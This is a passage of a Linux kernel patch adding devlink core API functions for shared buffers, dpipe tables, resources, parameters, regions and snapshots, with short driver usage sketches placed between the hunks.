++	list_add_tail(&devlink_sb->list, &devlink->sb_list);
++	return 0;
++}
++EXPORT_SYMBOL_GPL(devl_sb_register);
++
++int devlink_sb_register(struct devlink *devlink, unsigned int sb_index,
++			u32 size, u16 ingress_pools_count,
++			u16 egress_pools_count, u16 ingress_tc_count,
++			u16 egress_tc_count)
++{
++	int err;
++
++	devl_lock(devlink);
++	err = devl_sb_register(devlink, sb_index, size, ingress_pools_count,
++			       egress_pools_count, ingress_tc_count,
++			       egress_tc_count);
++	devl_unlock(devlink);
++	return err;
++}
++EXPORT_SYMBOL_GPL(devlink_sb_register);
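As a sketch (sizes hypothetical), a driver exposing one 1 MB shared buffer with two pools and eight traffic classes per direction would call:

	err = devlink_sb_register(devlink, 0 /* sb_index */, SZ_1M,
				  2, 2,		/* ingress/egress pools */
				  8, 8);	/* ingress/egress TCs */
	if (err)
		return err;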
++
++void devl_sb_unregister(struct devlink *devlink, unsigned int sb_index)
++{
++	struct devlink_sb *devlink_sb;
++
++	lockdep_assert_held(&devlink->lock);
++
++	devlink_sb = devlink_sb_get_by_index(devlink, sb_index);
++	WARN_ON(!devlink_sb);
++	list_del(&devlink_sb->list);
++	kfree(devlink_sb);
++}
++EXPORT_SYMBOL_GPL(devl_sb_unregister);
++
++void devlink_sb_unregister(struct devlink *devlink, unsigned int sb_index)
++{
++	devl_lock(devlink);
++	devl_sb_unregister(devlink, sb_index);
++	devl_unlock(devlink);
++}
++EXPORT_SYMBOL_GPL(devlink_sb_unregister);
++
++/**
++ * devl_dpipe_headers_register - register dpipe headers
++ *
++ * @devlink: devlink
++ * @dpipe_headers: dpipe header array
++ *
++ * Register the headers supported by hardware.
++ */
++void devl_dpipe_headers_register(struct devlink *devlink,
++				 struct devlink_dpipe_headers *dpipe_headers)
++{
++	lockdep_assert_held(&devlink->lock);
++
++	devlink->dpipe_headers = dpipe_headers;
++}
++EXPORT_SYMBOL_GPL(devl_dpipe_headers_register);
++
++/**
++ * devl_dpipe_headers_unregister - unregister dpipe headers
++ *
++ * @devlink: devlink
++ *
++ * Unregister the headers supported by hardware.
++ */
++void devl_dpipe_headers_unregister(struct devlink *devlink)
++{
++	lockdep_assert_held(&devlink->lock);
++
++	devlink->dpipe_headers = NULL;
++}
++EXPORT_SYMBOL_GPL(devl_dpipe_headers_unregister);
++
++/**
++ *	devlink_dpipe_table_counter_enabled - check if counter allocation
++ *					      required
++ *	@devlink: devlink
++ *	@table_name: table name
++ *
++ *	Used by the driver to check if counter allocation is required.
++ *	After counter allocation is turned on, the table entries
++ *	are updated to include counter statistics.
++ *
++ *	From that point on, the driver must respect the counter
++ *	state so that each entry added to the table is added
++ *	with a counter.
++ */
++bool devlink_dpipe_table_counter_enabled(struct devlink *devlink,
++					 const char *table_name)
++{
++	struct devlink_dpipe_table *table;
++	bool enabled;
++
++	rcu_read_lock();
++	table = devlink_dpipe_table_find(&devlink->dpipe_table_list,
++					 table_name, devlink);
++	enabled = false;
++	if (table)
++		enabled = table->counters_enabled;
++	rcu_read_unlock();
++	return enabled;
++}
++EXPORT_SYMBOL_GPL(devlink_dpipe_table_counter_enabled);
++
++/**
++ * devl_dpipe_table_register - register dpipe table
++ *
++ * @devlink: devlink
++ * @table_name: table name
++ * @table_ops: table ops
++ * @priv: priv
++ * @counter_control_extern: external control for counters
++ */
++int devl_dpipe_table_register(struct devlink *devlink,
++			      const char *table_name,
++			      struct devlink_dpipe_table_ops *table_ops,
++			      void *priv, bool counter_control_extern)
++{
++	struct devlink_dpipe_table *table;
++
++	lockdep_assert_held(&devlink->lock);
++
++	if (WARN_ON(!table_ops->size_get))
++		return -EINVAL;
++
++	if (devlink_dpipe_table_find(&devlink->dpipe_table_list, table_name,
++				     devlink))
++		return -EEXIST;
++
++	table = kzalloc(sizeof(*table), GFP_KERNEL);
++	if (!table)
++		return -ENOMEM;
++
++	table->name = table_name;
++	table->table_ops = table_ops;
++	table->priv = priv;
++	table->counter_control_extern = counter_control_extern;
++
++	list_add_tail_rcu(&table->list, &devlink->dpipe_table_list);
++
++	return 0;
++}
++EXPORT_SYMBOL_GPL(devl_dpipe_table_register);
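A sketch of registering a dpipe table; the my_* ops and the table name are hypothetical, and size_get is the only callback enforced by the WARN_ON above. The devl_ variant requires devlink->lock to be held:

	static struct devlink_dpipe_table_ops my_table_ops = {
		.matches_dump		= my_matches_dump,
		.actions_dump		= my_actions_dump,
		.entries_dump		= my_entries_dump,
		.counters_set_update	= my_counters_set_update,
		.size_get		= my_table_size_get,
	};

	err = devl_dpipe_table_register(devlink, "my_host_table",
					&my_table_ops, priv, false);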
++
++/**
++ * devl_dpipe_table_unregister - unregister dpipe table
++ *
++ * @devlink: devlink
++ * @table_name: table name
++ */
++void devl_dpipe_table_unregister(struct devlink *devlink,
++				 const char *table_name)
++{
++	struct devlink_dpipe_table *table;
++
++	lockdep_assert_held(&devlink->lock);
++
++	table = devlink_dpipe_table_find(&devlink->dpipe_table_list,
++					 table_name, devlink);
++	if (!table)
++		return;
++	list_del_rcu(&table->list);
++	kfree_rcu(table, rcu);
++}
++EXPORT_SYMBOL_GPL(devl_dpipe_table_unregister);
++
++/**
++ * devl_resource_register - devlink resource register
++ *
++ * @devlink: devlink
++ * @resource_name: resource's name
++ * @resource_size: resource's size
++ * @resource_id: resource's id
++ * @parent_resource_id: resource's parent id
++ * @size_params: size parameters
++ *
++ * Generic resources should reuse the same names across drivers.
++ * Please see the generic resources list at:
++ * Documentation/networking/devlink/devlink-resource.rst
++ */
++int devl_resource_register(struct devlink *devlink,
++			   const char *resource_name,
++			   u64 resource_size,
++			   u64 resource_id,
++			   u64 parent_resource_id,
++			   const struct devlink_resource_size_params *size_params)
++{
++	struct devlink_resource *resource;
++	struct list_head *resource_list;
++	bool top_hierarchy;
++
++	lockdep_assert_held(&devlink->lock);
++
++	top_hierarchy = parent_resource_id == DEVLINK_RESOURCE_ID_PARENT_TOP;
++
++	resource = devlink_resource_find(devlink, NULL, resource_id);
++	if (resource)
++		return -EINVAL;
++
++	resource = kzalloc(sizeof(*resource), GFP_KERNEL);
++	if (!resource)
++		return -ENOMEM;
++
++	if (top_hierarchy) {
++		resource_list = &devlink->resource_list;
++	} else {
++		struct devlink_resource *parent_resource;
++
++		parent_resource = devlink_resource_find(devlink, NULL,
++							parent_resource_id);
++		if (parent_resource) {
++			resource_list = &parent_resource->resource_list;
++			resource->parent = parent_resource;
++		} else {
++			kfree(resource);
++			return -EINVAL;
++		}
++	}
++
++	resource->name = resource_name;
++	resource->size = resource_size;
++	resource->size_new = resource_size;
++	resource->id = resource_id;
++	resource->size_valid = true;
++	memcpy(&resource->size_params, size_params,
++	       sizeof(resource->size_params));
++	INIT_LIST_HEAD(&resource->resource_list);
++	list_add_tail(&resource->list, resource_list);
++
++	return 0;
++}
++EXPORT_SYMBOL_GPL(devl_resource_register);
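For example (resource ID and sizes hypothetical), a top-level resource resizable in 1024-entry steps would be registered like this, with devlink->lock held:

	struct devlink_resource_size_params size_params;

	devlink_resource_size_params_init(&size_params, 64 * 1024, 256 * 1024,
					  1024, DEVLINK_RESOURCE_UNIT_ENTRY);
	err = devl_resource_register(devlink, "kvd", 128 * 1024,
				     MY_RESOURCE_ID_KVD,
				     DEVLINK_RESOURCE_ID_PARENT_TOP,
				     &size_params);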
++
++/**
++ *	devlink_resource_register - devlink resource register
++ *
++ *	@devlink: devlink
++ *	@resource_name: resource's name
++ *	@resource_size: resource's size
++ *	@resource_id: resource's id
++ *	@parent_resource_id: resource's parent id
++ *	@size_params: size parameters
++ *
++ *	Generic resources should reuse the same names across drivers.
++ *	Please see the generic resources list at:
++ *	Documentation/networking/devlink/devlink-resource.rst
++ *
++ *	Context: Takes and releases devlink->lock <mutex>.
++ */
++int devlink_resource_register(struct devlink *devlink,
++			      const char *resource_name,
++			      u64 resource_size,
++			      u64 resource_id,
++			      u64 parent_resource_id,
++			      const struct devlink_resource_size_params *size_params)
++{
++	int err;
++
++	devl_lock(devlink);
++	err = devl_resource_register(devlink, resource_name, resource_size,
++				     resource_id, parent_resource_id, size_params);
++	devl_unlock(devlink);
++	return err;
++}
++EXPORT_SYMBOL_GPL(devlink_resource_register);
++
++static void devlink_resource_unregister(struct devlink *devlink,
++					struct devlink_resource *resource)
++{
++	struct devlink_resource *tmp, *child_resource;
++
++	list_for_each_entry_safe(child_resource, tmp, &resource->resource_list,
++				 list) {
++		devlink_resource_unregister(devlink, child_resource);
++		list_del(&child_resource->list);
++		kfree(child_resource);
++	}
++}
++
++/**
++ * devl_resources_unregister - free all resources
++ *
++ * @devlink: devlink
++ */
++void devl_resources_unregister(struct devlink *devlink)
++{
++	struct devlink_resource *tmp, *child_resource;
++
++	lockdep_assert_held(&devlink->lock);
++
++	list_for_each_entry_safe(child_resource, tmp, &devlink->resource_list,
++				 list) {
++		devlink_resource_unregister(devlink, child_resource);
++		list_del(&child_resource->list);
++		kfree(child_resource);
++	}
++}
++EXPORT_SYMBOL_GPL(devl_resources_unregister);
++
++/**
++ *	devlink_resources_unregister - free all resources
++ *
++ *	@devlink: devlink
++ *
++ *	Context: Takes and releases devlink->lock <mutex>.
++ */
++void devlink_resources_unregister(struct devlink *devlink)
++{
++	devl_lock(devlink);
++	devl_resources_unregister(devlink);
++	devl_unlock(devlink);
++}
++EXPORT_SYMBOL_GPL(devlink_resources_unregister);
++
++/**
++ * devl_resource_size_get - get and update size
++ *
++ * @devlink: devlink
++ * @resource_id: the requested resource id
++ * @p_resource_size: ptr to update
++ */
++int devl_resource_size_get(struct devlink *devlink,
++			   u64 resource_id,
++			   u64 *p_resource_size)
++{
++	struct devlink_resource *resource;
++
++	lockdep_assert_held(&devlink->lock);
++
++	resource = devlink_resource_find(devlink, NULL, resource_id);
++	if (!resource)
++		return -EINVAL;
++	*p_resource_size = resource->size_new;
++	resource->size = resource->size_new;
++	return 0;
++}
++EXPORT_SYMBOL_GPL(devl_resource_size_get);
++
++/**
++ * devl_dpipe_table_resource_set - set the resource id
++ *
++ * @devlink: devlink
++ * @table_name: table name
++ * @resource_id: resource id
++ * @resource_units: number of resource's units consumed per table's entry
++ */
++int devl_dpipe_table_resource_set(struct devlink *devlink,
++				  const char *table_name, u64 resource_id,
++				  u64 resource_units)
++{
++	struct devlink_dpipe_table *table;
++
++	table = devlink_dpipe_table_find(&devlink->dpipe_table_list,
++					 table_name, devlink);
++	if (!table)
++		return -EINVAL;
++
++	table->resource_id = resource_id;
++	table->resource_units = resource_units;
++	table->resource_valid = true;
++	return 0;
++}
++EXPORT_SYMBOL_GPL(devl_dpipe_table_resource_set);
++
++/**
++ * devl_resource_occ_get_register - register occupancy getter
++ *
++ * @devlink: devlink
++ * @resource_id: resource id
++ * @occ_get: occupancy getter callback
++ * @occ_get_priv: occupancy getter callback priv
++ */
++void devl_resource_occ_get_register(struct devlink *devlink,
++				    u64 resource_id,
++				    devlink_resource_occ_get_t *occ_get,
++				    void *occ_get_priv)
++{
++	struct devlink_resource *resource;
++
++	lockdep_assert_held(&devlink->lock);
++
++	resource = devlink_resource_find(devlink, NULL, resource_id);
++	if (WARN_ON(!resource))
++		return;
++	WARN_ON(resource->occ_get);
++
++	resource->occ_get = occ_get;
++	resource->occ_get_priv = occ_get_priv;
++}
++EXPORT_SYMBOL_GPL(devl_resource_occ_get_register);
++
++/**
++ *	devlink_resource_occ_get_register - register occupancy getter
++ *
++ *	@devlink: devlink
++ *	@resource_id: resource id
++ *	@occ_get: occupancy getter callback
++ *	@occ_get_priv: occupancy getter callback priv
++ *
++ *	Context: Takes and releases devlink->lock <mutex>.
++ */
++void devlink_resource_occ_get_register(struct devlink *devlink,
++				       u64 resource_id,
++				       devlink_resource_occ_get_t *occ_get,
++				       void *occ_get_priv)
++{
++	devl_lock(devlink);
++	devl_resource_occ_get_register(devlink, resource_id,
++				       occ_get, occ_get_priv);
++	devl_unlock(devlink);
++}
++EXPORT_SYMBOL_GPL(devlink_resource_occ_get_register);
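A hypothetical occupancy getter for the resource sketched earlier (my_hw_kvd_used and struct my_dev are assumed):

	static u64 my_kvd_occ_get(void *priv)
	{
		struct my_dev *mydev = priv;

		return my_hw_kvd_used(mydev);
	}

	devlink_resource_occ_get_register(devlink, MY_RESOURCE_ID_KVD,
					  my_kvd_occ_get, mydev);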
++
++/**
++ * devl_resource_occ_get_unregister - unregister occupancy getter
++ *
++ * @devlink: devlink
++ * @resource_id: resource id
++ */
++void devl_resource_occ_get_unregister(struct devlink *devlink,
++				      u64 resource_id)
++{
++	struct devlink_resource *resource;
++
++	lockdep_assert_held(&devlink->lock);
++
++	resource = devlink_resource_find(devlink, NULL, resource_id);
++	if (WARN_ON(!resource))
++		return;
++	WARN_ON(!resource->occ_get);
++
++	resource->occ_get = NULL;
++	resource->occ_get_priv = NULL;
++}
++EXPORT_SYMBOL_GPL(devl_resource_occ_get_unregister);
++
++/**
++ *	devlink_resource_occ_get_unregister - unregister occupancy getter
++ *
++ *	@devlink: devlink
++ *	@resource_id: resource id
++ *
++ *	Context: Takes and releases devlink->lock <mutex>.
++ */
++void devlink_resource_occ_get_unregister(struct devlink *devlink,
++					 u64 resource_id)
++{
++	devl_lock(devlink);
++	devl_resource_occ_get_unregister(devlink, resource_id);
++	devl_unlock(devlink);
++}
++EXPORT_SYMBOL_GPL(devlink_resource_occ_get_unregister);
++
++static int devlink_param_verify(const struct devlink_param *param)
++{
++	if (!param || !param->name || !param->supported_cmodes)
++		return -EINVAL;
++	if (param->generic)
++		return devlink_param_generic_verify(param);
++	else
++		return devlink_param_driver_verify(param);
++}
++
++/**
++ *	devlink_params_register - register configuration parameters
++ *
++ *	@devlink: devlink
++ *	@params: configuration parameters array
++ *	@params_count: number of parameters provided
++ *
++ *	Register the configuration parameters supported by the driver.
++ */
++int devlink_params_register(struct devlink *devlink,
++			    const struct devlink_param *params,
++			    size_t params_count)
++{
++	const struct devlink_param *param = params;
++	int i, err;
++
++	ASSERT_DEVLINK_NOT_REGISTERED(devlink);
++
++	for (i = 0; i < params_count; i++, param++) {
++		err = devlink_param_register(devlink, param);
++		if (err)
++			goto rollback;
++	}
++	return 0;
++
++rollback:
++	if (!i)
++		return err;
++
++	for (param--; i > 0; i--, param--)
++		devlink_param_unregister(devlink, param);
++	return err;
++}
++EXPORT_SYMBOL_GPL(devlink_params_register);
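A sketch of a parameter array built with the generic-parameter helper macro; for a driverinit-only parameter the get/set ops must be NULL, matching the WARN_ON in devlink_param_register() below:

	static const struct devlink_param my_params[] = {
		DEVLINK_PARAM_GENERIC(ENABLE_ROCE,
				      BIT(DEVLINK_PARAM_CMODE_DRIVERINIT),
				      NULL, NULL, NULL),
	};

	err = devlink_params_register(devlink, my_params,
				      ARRAY_SIZE(my_params));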
++
++/**
++ *	devlink_params_unregister - unregister configuration parameters
++ *	@devlink: devlink
++ *	@params: configuration parameters to unregister
++ *	@params_count: number of parameters provided
++ */
++void devlink_params_unregister(struct devlink *devlink,
++			       const struct devlink_param *params,
++			       size_t params_count)
++{
++	const struct devlink_param *param = params;
++	int i;
++
++	ASSERT_DEVLINK_NOT_REGISTERED(devlink);
++
++	for (i = 0; i < params_count; i++, param++)
++		devlink_param_unregister(devlink, param);
++}
++EXPORT_SYMBOL_GPL(devlink_params_unregister);
++
++/**
++ * devlink_param_register - register one configuration parameter
++ *
++ * @devlink: devlink
++ * @param: one configuration parameter
++ *
++ * Register the configuration parameter supported by the driver.
++ * Return: 0 on successful registration or a negative error code otherwise.
++ */
++int devlink_param_register(struct devlink *devlink,
++			   const struct devlink_param *param)
++{
++	struct devlink_param_item *param_item;
++
++	ASSERT_DEVLINK_NOT_REGISTERED(devlink);
++
++	WARN_ON(devlink_param_verify(param));
++	WARN_ON(devlink_param_find_by_name(&devlink->param_list, param->name));
++
++	if (param->supported_cmodes == BIT(DEVLINK_PARAM_CMODE_DRIVERINIT))
++		WARN_ON(param->get || param->set);
++	else
++		WARN_ON(!param->get || !param->set);
++
++	param_item = kzalloc(sizeof(*param_item), GFP_KERNEL);
++	if (!param_item)
++		return -ENOMEM;
++
++	param_item->param = param;
++
++	list_add_tail(&param_item->list, &devlink->param_list);
++	return 0;
++}
++EXPORT_SYMBOL_GPL(devlink_param_register);
++
++/**
++ * devlink_param_unregister - unregister one configuration parameter
++ * @devlink: devlink
++ * @param: configuration parameter to unregister
++ */
++void devlink_param_unregister(struct devlink *devlink,
++			      const struct devlink_param *param)
++{
++	struct devlink_param_item *param_item;
++
++	ASSERT_DEVLINK_NOT_REGISTERED(devlink);
++
++	param_item =
++		devlink_param_find_by_name(&devlink->param_list, param->name);
++	WARN_ON(!param_item);
++	list_del(&param_item->list);
++	kfree(param_item);
++}
++EXPORT_SYMBOL_GPL(devlink_param_unregister);
++
++/**
++ *	devlink_param_driverinit_value_get - get configuration parameter
++ *					     value for driver initialization
++ *
++ *	@devlink: devlink
++ *	@param_id: parameter ID
++ *	@init_val: value of parameter in driverinit configuration mode
++ *
++ *	This function should be used by the driver to get the driverinit
++ *	configuration for initialization after a reload command.
++ */
++int devlink_param_driverinit_value_get(struct devlink *devlink, u32 param_id,
++				       union devlink_param_value *init_val)
++{
++	struct devlink_param_item *param_item;
++
++	if (!devlink_reload_supported(devlink->ops))
++		return -EOPNOTSUPP;
++
++	param_item = devlink_param_find_by_id(&devlink->param_list, param_id);
++	if (!param_item)
++		return -EINVAL;
++
++	if (!param_item->driverinit_value_valid ||
++	    !devlink_param_cmode_is_supported(param_item->param,
++					      DEVLINK_PARAM_CMODE_DRIVERINIT))
++		return -EOPNOTSUPP;
++
++	if (param_item->param->type == DEVLINK_PARAM_TYPE_STRING)
++		strcpy(init_val->vstr, param_item->driverinit_value.vstr);
++	else
++		*init_val = param_item->driverinit_value;
++
++	return 0;
++}
++EXPORT_SYMBOL_GPL(devlink_param_driverinit_value_get);
++
++/**
++ *	devlink_param_driverinit_value_set - set value of configuration
++ *					     parameter for driverinit
++ *					     configuration mode
++ *
++ *	@devlink: devlink
++ *	@param_id: parameter ID
++ *	@init_val: value of parameter to set for driverinit configuration mode
++ *
++ *	This function should be used by the driver to set the driverinit
++ *	configuration mode default value.
++ */
++int devlink_param_driverinit_value_set(struct devlink *devlink, u32 param_id,
++				       union devlink_param_value init_val)
++{
++	struct devlink_param_item *param_item;
++
++	ASSERT_DEVLINK_NOT_REGISTERED(devlink);
++
++	param_item = devlink_param_find_by_id(&devlink->param_list, param_id);
++	if (!param_item)
++		return -EINVAL;
++
++	if (!devlink_param_cmode_is_supported(param_item->param,
++					      DEVLINK_PARAM_CMODE_DRIVERINIT))
++		return -EOPNOTSUPP;
++
++	if (param_item->param->type == DEVLINK_PARAM_TYPE_STRING)
++		strcpy(param_item->driverinit_value.vstr, init_val.vstr);
++	else
++		param_item->driverinit_value = init_val;
++	param_item->driverinit_value_valid = true;
++	return 0;
++}
++EXPORT_SYMBOL_GPL(devlink_param_driverinit_value_set);
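The two driverinit helpers pair up as follows; a sketch assuming a boolean generic parameter and a hypothetical my_enable_roce() helper:

	union devlink_param_value val;

	/* Before devlink_register(): publish the driver default. */
	val.vbool = true;
	devlink_param_driverinit_value_set(devlink,
					   DEVLINK_PARAM_GENERIC_ID_ENABLE_ROCE,
					   val);

	/* During (re)initialization: read back the possibly updated value. */
	if (!devlink_param_driverinit_value_get(devlink,
						DEVLINK_PARAM_GENERIC_ID_ENABLE_ROCE,
						&val))
		my_enable_roce(mydev, val.vbool);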
++
++/**
++ *	devlink_param_value_changed - notify devlink on a parameter's value
++ *				      change. Should be called by the driver
++ *				      right after the change.
++ *
++ *	@devlink: devlink
++ *	@param_id: parameter ID
++ *
++ *	This function should be used by the driver to notify devlink on value
++ *	change, excluding driverinit configuration mode.
++ *	For driverinit configuration mode the driver should use
++ *	devlink_param_driverinit_value_set() instead.
++ */
++void devlink_param_value_changed(struct devlink *devlink, u32 param_id)
++{
++	struct devlink_param_item *param_item;
++
++	param_item = devlink_param_find_by_id(&devlink->param_list, param_id);
++	WARN_ON(!param_item);
++
++	devlink_param_notify(devlink, 0, param_item, DEVLINK_CMD_PARAM_NEW);
++}
++EXPORT_SYMBOL_GPL(devlink_param_value_changed);
++
++/**
++ * devl_region_create - create a new address region
++ *
++ * @devlink: devlink
++ * @ops: region operations and name
++ * @region_max_snapshots: Maximum supported number of snapshots for region
++ * @region_size: size of region
++ */
++struct devlink_region *devl_region_create(struct devlink *devlink,
++					  const struct devlink_region_ops *ops,
++					  u32 region_max_snapshots,
++					  u64 region_size)
++{
++	struct devlink_region *region;
++
++	devl_assert_locked(devlink);
++
++	if (WARN_ON(!ops) || WARN_ON(!ops->destructor))
++		return ERR_PTR(-EINVAL);
++
++	if (devlink_region_get_by_name(devlink, ops->name))
++		return ERR_PTR(-EEXIST);
++
++	region = kzalloc(sizeof(*region), GFP_KERNEL);
++	if (!region)
++		return ERR_PTR(-ENOMEM);
++
++	region->devlink = devlink;
++	region->max_snapshots = region_max_snapshots;
++	region->ops = ops;
++	region->size = region_size;
++	INIT_LIST_HEAD(&region->snapshot_list);
++	mutex_init(&region->snapshot_lock);
++	list_add_tail(&region->list, &devlink->region_list);
++	devlink_nl_region_notify(region, NULL, DEVLINK_CMD_REGION_NEW);
++
++	return region;
++}
++EXPORT_SYMBOL_GPL(devl_region_create);
++
++/**
++ *	devlink_region_create - create a new address region
++ *
++ *	@devlink: devlink
++ *	@ops: region operations and name
++ *	@region_max_snapshots: Maximum supported number of snapshots for region
++ *	@region_size: size of region
++ *
++ *	Context: Takes and releases devlink->lock <mutex>.
++ */
++struct devlink_region *
++devlink_region_create(struct devlink *devlink,
++		      const struct devlink_region_ops *ops,
++		      u32 region_max_snapshots, u64 region_size)
++{
++	struct devlink_region *region;
++
++	devl_lock(devlink);
++	region = devl_region_create(devlink, ops, region_max_snapshots,
++				    region_size);
++	devl_unlock(devlink);
++	return region;
++}
++EXPORT_SYMBOL_GPL(devlink_region_create);
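A minimal sketch of a region whose snapshot buffers are plain kmalloc() allocations, so kfree serves as the mandatory destructor (MY_REGS_REGION_SIZE is hypothetical):

	static const struct devlink_region_ops my_regs_region_ops = {
		.name		= "registers",
		.destructor	= kfree,
	};

	region = devlink_region_create(devlink, &my_regs_region_ops,
				       8 /* max snapshots */,
				       MY_REGS_REGION_SIZE);
	if (IS_ERR(region))
		return PTR_ERR(region);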
++
++/**
++ *	devlink_port_region_create - create a new address region for a port
++ *
++ *	@port: devlink port
++ *	@ops: region operations and name
++ *	@region_max_snapshots: Maximum supported number of snapshots for region
++ *	@region_size: size of region
++ *
++ *	Context: Takes and releases devlink->lock <mutex>.
++ */
++struct devlink_region *
++devlink_port_region_create(struct devlink_port *port,
++			   const struct devlink_port_region_ops *ops,
++			   u32 region_max_snapshots, u64 region_size)
++{
++	struct devlink *devlink = port->devlink;
++	struct devlink_region *region;
++	int err = 0;
++
++	ASSERT_DEVLINK_PORT_INITIALIZED(port);
++
++	if (WARN_ON(!ops) || WARN_ON(!ops->destructor))
++		return ERR_PTR(-EINVAL);
++
++	devl_lock(devlink);
++
++	if (devlink_port_region_get_by_name(port, ops->name)) {
++		err = -EEXIST;
++		goto unlock;
++	}
++
++	region = kzalloc(sizeof(*region), GFP_KERNEL);
++	if (!region) {
++		err = -ENOMEM;
++		goto unlock;
++	}
++
++	region->devlink = devlink;
++	region->port = port;
++	region->max_snapshots = region_max_snapshots;
++	region->port_ops = ops;
++	region->size = region_size;
++	INIT_LIST_HEAD(&region->snapshot_list);
++	mutex_init(&region->snapshot_lock);
++	list_add_tail(&region->list, &port->region_list);
++	devlink_nl_region_notify(region, NULL, DEVLINK_CMD_REGION_NEW);
++
++	devl_unlock(devlink);
++	return region;
++
++unlock:
++	devl_unlock(devlink);
++	return ERR_PTR(err);
++}
++EXPORT_SYMBOL_GPL(devlink_port_region_create);
++
++/**
++ * devl_region_destroy - destroy address region
++ *
++ * @region: devlink region to destroy
++ */
++void devl_region_destroy(struct devlink_region *region)
++{
++	struct devlink *devlink = region->devlink;
++	struct devlink_snapshot *snapshot, *ts;
++
++	devl_assert_locked(devlink);
++
++	/* Free all snapshots of region */
++	mutex_lock(&region->snapshot_lock);
++	list_for_each_entry_safe(snapshot, ts, &region->snapshot_list, list)
++		devlink_region_snapshot_del(region, snapshot);
++	mutex_unlock(&region->snapshot_lock);
++
++	list_del(&region->list);
++	mutex_destroy(&region->snapshot_lock);
++
++	devlink_nl_region_notify(region, NULL, DEVLINK_CMD_REGION_DEL);
++	kfree(region);
++}
++EXPORT_SYMBOL_GPL(devl_region_destroy);
++
++/**
++ *	devlink_region_destroy - destroy address region
++ *
++ *	@region: devlink region to destroy
++ *
++ *	Context: Takes and releases devlink->lock <mutex>.
++ */
++void devlink_region_destroy(struct devlink_region *region)
++{
++	struct devlink *devlink = region->devlink;
++
++	devl_lock(devlink);
++	devl_region_destroy(region);
++	devl_unlock(devlink);
++}
++EXPORT_SYMBOL_GPL(devlink_region_destroy);
++
++/**
++ *	devlink_region_snapshot_id_get - get snapshot ID
++ *
++ *	This function should be called when adding a new snapshot.
++ *	The driver should use the same id for multiple snapshots taken
++ *	on multiple regions at the same time or by the same trigger.
++ *
++ *	The caller of this function must use devlink_region_snapshot_id_put
++ *	when finished creating snapshots using this id.
++ *
++ *	Returns zero on success, or a negative error code on failure.
++ *
++ *	@devlink: devlink
++ *	@id: storage to return id
++ */
++int devlink_region_snapshot_id_get(struct devlink *devlink, u32 *id)
++{
++	return __devlink_region_snapshot_id_get(devlink, id);
++}
++EXPORT_SYMBOL_GPL(devlink_region_snapshot_id_get);
++
++/**
++ *	devlink_region_snapshot_id_put - put snapshot ID reference
++ *
++ *	This should be called by a driver after finishing creating snapshots
++ *	with an id. Doing so ensures that the ID can later be released in the
++ *	event that all snapshots using it have been destroyed.
++ *
++ *	@devlink: devlink
++ *	@id: id to release reference on
++ */
++void devlink_region_snapshot_id_put(struct devlink *devlink, u32 id)
++{
++	__devlink_snapshot_id_decrement(devlink, id);
++}
++EXPORT_SYMBOL_GPL(devlink_region_snapshot_id_put);
++
++/**
++ *	devlink_region_snapshot_create - create a new snapshot
++ *	This will add a new snapshot of a region. The snapshot
++ *	will be stored on the region struct and can be accessed
++ *	from devlink, which is useful for later analysis.
++ *	Multiple snapshots can be created on a region.
++ *	The @snapshot_id should be obtained using the getter function.
++ *
++ *	@region: devlink region of the snapshot
++ *	@data: snapshot data
++ *	@snapshot_id: snapshot id to be created
++ */
++int devlink_region_snapshot_create(struct devlink_region *region,
++				   u8 *data, u32 snapshot_id)
++{
++	int err;
++
++	mutex_lock(&region->snapshot_lock);
++	err = __devlink_region_snapshot_create(region, data, snapshot_id);
++	mutex_unlock(&region->snapshot_lock);
++	return err;
++}
++EXPORT_SYMBOL_GPL(devlink_region_snapshot_create);
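Putting the three snapshot helpers together, a hypothetical dump path (my_dump_registers is assumed) looks like this:

	u32 snapshot_id;
	u8 *data;
	int err;

	err = devlink_region_snapshot_id_get(devlink, &snapshot_id);
	if (err)
		return err;

	data = my_dump_registers(mydev);
	err = devlink_region_snapshot_create(region, data, snapshot_id);
	if (err)
		kfree(data);	/* ownership passes to the region only on success */

	devlink_region_snapshot_id_put(devlink, snapshot_id);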
++
++#define DEVLINK_TRAP(_id, _type)					      \
++	{								      \
++		.type = DEVLINK_TRAP_TYPE_##_type,			      \
++		.id = DEVLINK_TRAP_GENERIC_ID_##_id,			      \
++		.name = DEVLINK_TRAP_GENERIC_NAME_##_id,		      \
++	}
++
++static const struct devlink_trap devlink_trap_generic[] = {
++	DEVLINK_TRAP(SMAC_MC, DROP),
++	DEVLINK_TRAP(VLAN_TAG_MISMATCH, DROP),
++	DEVLINK_TRAP(INGRESS_VLAN_FILTER, DROP),
++	DEVLINK_TRAP(INGRESS_STP_FILTER, DROP),
++	DEVLINK_TRAP(EMPTY_TX_LIST, DROP),
++	DEVLINK_TRAP(PORT_LOOPBACK_FILTER, DROP),
++	DEVLINK_TRAP(BLACKHOLE_ROUTE, DROP),
++	DEVLINK_TRAP(TTL_ERROR, EXCEPTION),
++	DEVLINK_TRAP(TAIL_DROP, DROP),
++	DEVLINK_TRAP(NON_IP_PACKET, DROP),
++	DEVLINK_TRAP(UC_DIP_MC_DMAC, DROP),
++	DEVLINK_TRAP(DIP_LB, DROP),
++	DEVLINK_TRAP(SIP_MC, DROP),
++	DEVLINK_TRAP(SIP_LB, DROP),
++	DEVLINK_TRAP(CORRUPTED_IP_HDR, DROP),
++	DEVLINK_TRAP(IPV4_SIP_BC, DROP),
++	DEVLINK_TRAP(IPV6_MC_DIP_RESERVED_SCOPE, DROP),
++	DEVLINK_TRAP(IPV6_MC_DIP_INTERFACE_LOCAL_SCOPE, DROP),
++	DEVLINK_TRAP(MTU_ERROR, EXCEPTION),
++	DEVLINK_TRAP(UNRESOLVED_NEIGH, EXCEPTION),
++	DEVLINK_TRAP(RPF, EXCEPTION),
++	DEVLINK_TRAP(REJECT_ROUTE, EXCEPTION),
++	DEVLINK_TRAP(IPV4_LPM_UNICAST_MISS, EXCEPTION),
++	DEVLINK_TRAP(IPV6_LPM_UNICAST_MISS, EXCEPTION),
++	DEVLINK_TRAP(NON_ROUTABLE, DROP),
++	DEVLINK_TRAP(DECAP_ERROR, EXCEPTION),
++	DEVLINK_TRAP(OVERLAY_SMAC_MC, DROP),
++	DEVLINK_TRAP(INGRESS_FLOW_ACTION_DROP, DROP),
++	DEVLINK_TRAP(EGRESS_FLOW_ACTION_DROP, DROP),
++	DEVLINK_TRAP(STP, CONTROL),
++	DEVLINK_TRAP(LACP, CONTROL),
++	DEVLINK_TRAP(LLDP, CONTROL),
++	DEVLINK_TRAP(IGMP_QUERY, CONTROL),
++	DEVLINK_TRAP(IGMP_V1_REPORT, CONTROL),
++	DEVLINK_TRAP(IGMP_V2_REPORT, CONTROL),
